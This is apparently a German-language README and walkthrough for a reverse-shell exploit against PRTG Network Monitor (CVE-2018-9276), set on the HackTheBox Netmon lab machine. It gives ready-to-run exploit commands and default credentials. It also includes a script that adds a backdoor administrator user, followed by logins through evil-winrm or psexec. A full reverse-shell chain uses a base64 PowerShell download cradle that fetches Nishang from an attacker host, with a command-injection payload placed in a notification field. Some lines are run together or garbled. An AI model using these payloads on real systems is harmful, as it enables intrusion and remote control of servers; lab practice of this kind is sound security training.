
CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3-Unterstützung)
CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3-Unterstützung)
git clone https://github.com/A1vinSmith/CVE-2018-9276.git
./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
prtgadmin:prtgadmin aus. Und es könnte sich lohnen, die Datenbank oder das Log zu prüfen, um an sie zu gelangen. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data--lport 445, falls der Port nicht belegt istHTB Netmon-Box
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA362
Original Install Date: 2/3/2019, 7:05:45 AM
System Boot Time: 7/28/2021, 9:02:41 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Ein großes Dankeschön an wildkindcc für die Python2-Version https://github.com/wildkindcc/CVE-2018-9276
https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/
https://www.exploit-db.com/exploits/46527
https://github.com/chcx/PRTG-Network-Monitor-RCE
Die Anmeldedaten werden benötigt, um den Exploit auszuführen. Melde dich zuerst an und hole das authentifizierte Cookie, um einen neuen Benutzer hinzuzufügen.
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"
// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Falls wir keinen Benutzer hinzufügen möchten, können wir für eine bessere OPSEC eine Reverse Shell erhalten. Aufgrund der HTML-Kodierung werden jedoch viele Zeichen kodiert. Wir können das mit der PowerShell-Base64-Ausführung umgehen. Wir müssen einen base64-kodierten Befehl erstellen. Er sollte jedoch in der Kodierung vorliegen, die Windows verwendet, also UTF-16LE
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
Wir verwenden iconv, um den Befehl in die Zielkodierung zu konvertieren, und führen dann diese Reverse Shell von Nishang aus. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Lade das Skript herunter und füge den Befehl mit echo in die letzte Zeile ein.
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1
Starte nun einen einfachen HTTP-Server und erstelle eine neue Benachrichtigung
python3 -m http.server 80
Klicke auf Setup > Account Settings > Notifications -> klicke ganz rechts auf „Add new notification“ Löse die Benachrichtigung aus, indem du auf die Glocken-Schaltfläche klickst
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
